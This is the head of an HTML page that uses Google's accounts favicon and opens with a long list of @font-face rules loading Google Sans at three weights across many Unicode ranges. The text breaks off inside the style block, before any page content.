<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="icon" href="https://accounts.google.com/favicon.ico">
    <style>
			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(https://fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2rgCIlsw.woff2)format('woff2');
				unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2rACIlsw.woff2)format('woff2');
				unicode-range: U+0951-0952, U+0964-0965, U+0980-09FE, U+1CD0, U+1CD2, U+1CD5-1CD6, U+1CD8, U+1CE1, U+1CEA, U+1CED, U+1CF2, U+1CF5-1CF7, U+200C-200D, U+20B9, U+25CC, U+A8F1;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2kQCIlsw.woff2)format('woff2');
				unicode-range: U+02C7, U+02D8-02D9, U+02DB, U+0307, U+1400-167F, U+18B0-18F5, U+25CC, U+11AB0-11ABF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2swCIlsw.woff2)format('woff2');
				unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2ugCIlsw.woff2)format('woff2');
				unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vwCIlsw.woff2)format('woff2');
				unicode-range: U+0900-097F, U+1CD0-1CF9, U+200C-200D, U+20A8, U+20B9, U+20F0, U+25CC, U+A830-A839, U+A8E0-A8FF, U+11B00-11B09;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2rwCIlsw.woff2)format('woff2');
				unicode-range: U+030E, U+1200-1399, U+2D80-2DDE, U+AB01-AB2E, U+1E7E0-1E7E6, U+1E7E8-1E7EB, U+1E7ED-1E7EE, U+1E7F0-1E7FE;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2oQCIlsw.woff2)format('woff2');
				unicode-range: U+0589, U+10A0-10FF, U+1C90-1CBA, U+1CBD-1CBF, U+205A, U+2D00-2D2F, U+2E31;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2sgCIlsw.woff2)format('woff2');
				unicode-range: U+1F00-1FFF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vQCIlsw.woff2)format('woff2');
				unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2pQCIlsw.woff2)format('woff2');
				unicode-range: U+0951-0952, U+0964-0965, U+0A80-0AFF, U+200C-200D, U+20B9, U+25CC, U+A830-A839;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2nQCIlsw.woff2)format('woff2');
				unicode-range: U+0951-0952, U+0964-0965, U+0A01-0A76, U+200C-200D, U+20B9, U+25CC, U+262C, U+A830-A839;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vACIlsw.woff2)format('woff2');
				unicode-range: U+0307-0308, U+0590-05FF, U+200C-2010, U+20AA, U+25CC, U+FB1D-FB4F;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2tQCIlsw.woff2)format('woff2');
				unicode-range: U+1780-17FF, U+19E0-19FF, U+200C-200D, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2twCIlsw.woff2)format('woff2');
				unicode-range: U+0E81-0EDF, U+200C-200D, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2pgCIlsw.woff2)format('woff2');
				unicode-range: U+0307, U+0323, U+0951-0952, U+0964-0965, U+0D00-0D7F, U+1CDA, U+1CF2, U+200C-200D, U+20B9, U+25CC, U+A830-A832;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2pwCIlsw.woff2)format('woff2');
				unicode-range: U+0951-0952, U+0964-0965, U+0B01-0B77, U+1CDA, U+1CF2, U+200C-200D, U+20B9, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2owCIlsw.woff2)format('woff2');
				unicode-range: U+0964-0965, U+0D81-0DF4, U+1CF2, U+200C-200D, U+25CC, U+111E1-111F4;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq20ACIlsw.woff2)format('woff2');
				unicode-range: U+0001-000C, U+000E-001F, U+007F-009F, U+20DD-20E0, U+20E2-20E4, U+2150-218F, U+2190, U+2192, U+2194-2199, U+21AF, U+21E6-21F0, U+21F3, U+2218-2219, U+2299, U+22C4-22C6, U+2300-243F, U+2440-244A, U+2460-24FF, U+25A0-27BF, U+2800-28FF, U+2921-2922, U+2981, U+29BF, U+29EB, U+2B00-2BFF, U+4DC0-4DFF, U+FFF9-FFFB, U+10140-1018E, U+10190-1019C, U+101A0, U+101D0-101FD, U+102E0-102FB, U+10E60-10E7E, U+1D2C0-1D2D3, U+1D2E0-1D37F, U+1F000-1F0FF, U+1F100-1F1AD, U+1F1E6-1F1FF, U+1F30D-1F30F, U+1F315, U+1F31C, U+1F31E, U+1F320-1F32C, U+1F336, U+1F378, U+1F37D, U+1F382, U+1F393-1F39F, U+1F3A7-1F3A8, U+1F3AC-1F3AF, U+1F3C2, U+1F3C4-1F3C6, U+1F3CA-1F3CE, U+1F3D4-1F3E0, U+1F3ED, U+1F3F1-1F3F3, U+1F3F5-1F3F7, U+1F408, U+1F415, U+1F41F, U+1F426, U+1F43F, U+1F441-1F442, U+1F444, U+1F446-1F449, U+1F44C-1F44E, U+1F453, U+1F46A, U+1F47D, U+1F4A3, U+1F4B0, U+1F4B3, U+1F4B9, U+1F4BB, U+1F4BF, U+1F4C8-1F4CB, U+1F4D6, U+1F4DA, U+1F4DF, U+1F4E3-1F4E6, U+1F4EA-1F4ED, U+1F4F7, U+1F4F9-1F4FB, U+1F4FD-1F4FE, U+1F503, U+1F507-1F50B, U+1F50D, U+1F512-1F513, U+1F53E-1F54A, U+1F54F-1F5FA, U+1F610, U+1F650-1F67F, U+1F687, U+1F68D, U+1F691, U+1F694, U+1F698, U+1F6AD, U+1F6B2, U+1F6B9-1F6BA, U+1F6BC, U+1F6C6-1F6CF, U+1F6D3-1F6D7, U+1F6E0-1F6EA, U+1F6F0-1F6F3, U+1F6F7-1F6FC, U+1F700-1F7FF, U+1F800-1F80B, U+1F810-1F847, U+1F850-1F859, U+1F860-1F887, U+1F890-1F8AD, U+1F8B0-1F8BB, U+1F8C0-1F8C1, U+1F900-1F90B, U+1F93B, U+1F946, U+1F984, U+1F996, U+1F9E9, U+1FA00-1FA6F, U+1FA70-1FA7C, U+1FA80-1FA89, U+1FA8F-1FAC6, U+1FACE-1FADC, U+1FADF-1FAE9, U+1FAF0-1FAF8, U+1FB00-1FBFF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2qACIlsw.woff2)format('woff2');
				unicode-range: U+0964-0965, U+0B82-0BFA, U+200C-200D, U+20B9, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2ogCIlsw.woff2)format('woff2');
				unicode-range: U+0951-0952, U+0964-0965, U+0C00-0C7F, U+1CDA, U+1CF2, U+200C-200D, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2qgCIlsw.woff2)format('woff2');
				unicode-range: U+02D7, U+0303, U+0331, U+0E01-0E5B, U+200C-200D, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2sQCIlsw.woff2)format('woff2');
				unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2sACIlsw.woff2)format('woff2');
				unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 400;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2)format('woff2');
				unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2rgCIlsw.woff2)format('woff2');
				unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2rACIlsw.woff2)format('woff2');
				unicode-range: U+0951-0952, U+0964-0965, U+0980-09FE, U+1CD0, U+1CD2, U+1CD5-1CD6, U+1CD8, U+1CE1, U+1CEA, U+1CED, U+1CF2, U+1CF5-1CF7, U+200C-200D, U+20B9, U+25CC, U+A8F1;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2kQCIlsw.woff2)format('woff2');
				unicode-range: U+02C7, U+02D8-02D9, U+02DB, U+0307, U+1400-167F, U+18B0-18F5, U+25CC, U+11AB0-11ABF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2swCIlsw.woff2)format('woff2');
				unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2ugCIlsw.woff2)format('woff2');
				unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vwCIlsw.woff2)format('woff2');
				unicode-range: U+0900-097F, U+1CD0-1CF9, U+200C-200D, U+20A8, U+20B9, U+20F0, U+25CC, U+A830-A839, U+A8E0-A8FF, U+11B00-11B09;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2rwCIlsw.woff2)format('woff2');
				unicode-range: U+030E, U+1200-1399, U+2D80-2DDE, U+AB01-AB2E, U+1E7E0-1E7E6, U+1E7E8-1E7EB, U+1E7ED-1E7EE, U+1E7F0-1E7FE;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2oQCIlsw.woff2)format('woff2');
				unicode-range: U+0589, U+10A0-10FF, U+1C90-1CBA, U+1CBD-1CBF, U+205A, U+2D00-2D2F, U+2E31;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2sgCIlsw.woff2)format('woff2');
				unicode-range: U+1F00-1FFF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vQCIlsw.woff2)format('woff2');
				unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2pQCIlsw.woff2)format('woff2');
				unicode-range: U+0951-0952, U+0964-0965, U+0A80-0AFF, U+200C-200D, U+20B9, U+25CC, U+A830-A839;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2nQCIlsw.woff2)format('woff2');
				unicode-range: U+0951-0952, U+0964-0965, U+0A01-0A76, U+200C-200D, U+20B9, U+25CC, U+262C, U+A830-A839;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vACIlsw.woff2)format('woff2');
				unicode-range: U+0307-0308, U+0590-05FF, U+200C-2010, U+20AA, U+25CC, U+FB1D-FB4F;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2tQCIlsw.woff2)format('woff2');
				unicode-range: U+1780-17FF, U+19E0-19FF, U+200C-200D, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2twCIlsw.woff2)format('woff2');
				unicode-range: U+0E81-0EDF, U+200C-200D, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2pgCIlsw.woff2)format('woff2');
				unicode-range: U+0307, U+0323, U+0951-0952, U+0964-0965, U+0D00-0D7F, U+1CDA, U+1CF2, U+200C-200D, U+20B9, U+25CC, U+A830-A832;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2pwCIlsw.woff2)format('woff2');
				unicode-range: U+0951-0952, U+0964-0965, U+0B01-0B77, U+1CDA, U+1CF2, U+200C-200D, U+20B9, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2owCIlsw.woff2)format('woff2');
				unicode-range: U+0964-0965, U+0D81-0DF4, U+1CF2, U+200C-200D, U+25CC, U+111E1-111F4;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq20ACIlsw.woff2)format('woff2');
				unicode-range: U+0001-000C, U+000E-001F, U+007F-009F, U+20DD-20E0, U+20E2-20E4, U+2150-218F, U+2190, U+2192, U+2194-2199, U+21AF, U+21E6-21F0, U+21F3, U+2218-2219, U+2299, U+22C4-22C6, U+2300-243F, U+2440-244A, U+2460-24FF, U+25A0-27BF, U+2800-28FF, U+2921-2922, U+2981, U+29BF, U+29EB, U+2B00-2BFF, U+4DC0-4DFF, U+FFF9-FFFB, U+10140-1018E, U+10190-1019C, U+101A0, U+101D0-101FD, U+102E0-102FB, U+10E60-10E7E, U+1D2C0-1D2D3, U+1D2E0-1D37F, U+1F000-1F0FF, U+1F100-1F1AD, U+1F1E6-1F1FF, U+1F30D-1F30F, U+1F315, U+1F31C, U+1F31E, U+1F320-1F32C, U+1F336, U+1F378, U+1F37D, U+1F382, U+1F393-1F39F, U+1F3A7-1F3A8, U+1F3AC-1F3AF, U+1F3C2, U+1F3C4-1F3C6, U+1F3CA-1F3CE, U+1F3D4-1F3E0, U+1F3ED, U+1F3F1-1F3F3, U+1F3F5-1F3F7, U+1F408, U+1F415, U+1F41F, U+1F426, U+1F43F, U+1F441-1F442, U+1F444, U+1F446-1F449, U+1F44C-1F44E, U+1F453, U+1F46A, U+1F47D, U+1F4A3, U+1F4B0, U+1F4B3, U+1F4B9, U+1F4BB, U+1F4BF, U+1F4C8-1F4CB, U+1F4D6, U+1F4DA, U+1F4DF, U+1F4E3-1F4E6, U+1F4EA-1F4ED, U+1F4F7, U+1F4F9-1F4FB, U+1F4FD-1F4FE, U+1F503, U+1F507-1F50B, U+1F50D, U+1F512-1F513, U+1F53E-1F54A, U+1F54F-1F5FA, U+1F610, U+1F650-1F67F, U+1F687, U+1F68D, U+1F691, U+1F694, U+1F698, U+1F6AD, U+1F6B2, U+1F6B9-1F6BA, U+1F6BC, U+1F6C6-1F6CF, U+1F6D3-1F6D7, U+1F6E0-1F6EA, U+1F6F0-1F6F3, U+1F6F7-1F6FC, U+1F700-1F7FF, U+1F800-1F80B, U+1F810-1F847, U+1F850-1F859, U+1F860-1F887, U+1F890-1F8AD, U+1F8B0-1F8BB, U+1F8C0-1F8C1, U+1F900-1F90B, U+1F93B, U+1F946, U+1F984, U+1F996, U+1F9E9, U+1FA00-1FA6F, U+1FA70-1FA7C, U+1FA80-1FA89, U+1FA8F-1FAC6, U+1FACE-1FADC, U+1FADF-1FAE9, U+1FAF0-1FAF8, U+1FB00-1FBFF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2qACIlsw.woff2)format('woff2');
				unicode-range: U+0964-0965, U+0B82-0BFA, U+200C-200D, U+20B9, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2ogCIlsw.woff2)format('woff2');
				unicode-range: U+0951-0952, U+0964-0965, U+0C00-0C7F, U+1CDA, U+1CF2, U+200C-200D, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2qgCIlsw.woff2)format('woff2');
				unicode-range: U+02D7, U+0303, U+0331, U+0E01-0E5B, U+200C-200D, U+25CC;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2sQCIlsw.woff2)format('woff2');
				unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2sACIlsw.woff2)format('woff2');
				unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 500;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2)format('woff2');
				unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2rgCIlsw.woff2)format('woff2');
				unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2rACIlsw.woff2)format('woff2');
				unicode-range: U+0951-0952, U+0964-0965, U+0980-09FE, U+1CD0, U+1CD2, U+1CD5-1CD6, U+1CD8, U+1CE1, U+1CEA, U+1CED, U+1CF2, U+1CF5-1CF7, U+200C-200D, U+20B9, U+25CC, U+A8F1;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2kQCIlsw.woff2)format('woff2');
				unicode-range: U+02C7, U+02D8-02D9, U+02DB, U+0307, U+1400-167F, U+18B0-18F5, U+25CC, U+11AB0-11ABF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2swCIlsw.woff2)format('woff2');
				unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2ugCIlsw.woff2)format('woff2');
				unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vwCIlsw.woff2)format('woff2');
				unicode-range: U+0900-097F, U+1CD0-1CF9, U+200C-200D, U+20A8, U+20B9, U+20F0, U+25CC, U+A830-A839, U+A8E0-A8FF, U+11B00-11B09;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2rwCIlsw.woff2)format('woff2');
				unicode-range: U+030E, U+1200-1399, U+2D80-2DDE, U+AB01-AB2E, U+1E7E0-1E7E6, U+1E7E8-1E7EB, U+1E7ED-1E7EE, U+1E7F0-1E7FE;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2oQCIlsw.woff2)format('woff2');
				unicode-range: U+0589, U+10A0-10FF, U+1C90-1CBA, U+1CBD-1CBF, U+205A, U+2D00-2D2F, U+2E31;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2sgCIlsw.woff2)format('woff2');
				unicode-range: U+1F00-1FFF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vQCIlsw.woff2)format('woff2');
				unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2pQCIlsw.woff2)format('woff2');
				unicode-range: U+0951-0952, U+0964-0965, U+0A80-0AFF, U+200C-200D, U+20B9, U+25CC, U+A830-A839;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2nQCIlsw.woff2)format('woff2');
				unicode-range: U+0951-0952, U+0964-0965, U+0A01-0A76, U+200C-200D, U+20B9, U+25CC, U+262C, U+A830-A839;
			}

			@font-face {
				font-family: 'Google Sans';
				font-style: normal;
				font-weight: 700;
				src: url(//fonts.gstatic.com/s/googlesans/v62/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vACIlsw.woff2)format('woff2');
				unicode-range: U+0307-0308, U+0590-05FF, U+200C-2010, U+20AA, U+25CC, U+FB1D-FB4F;
			}

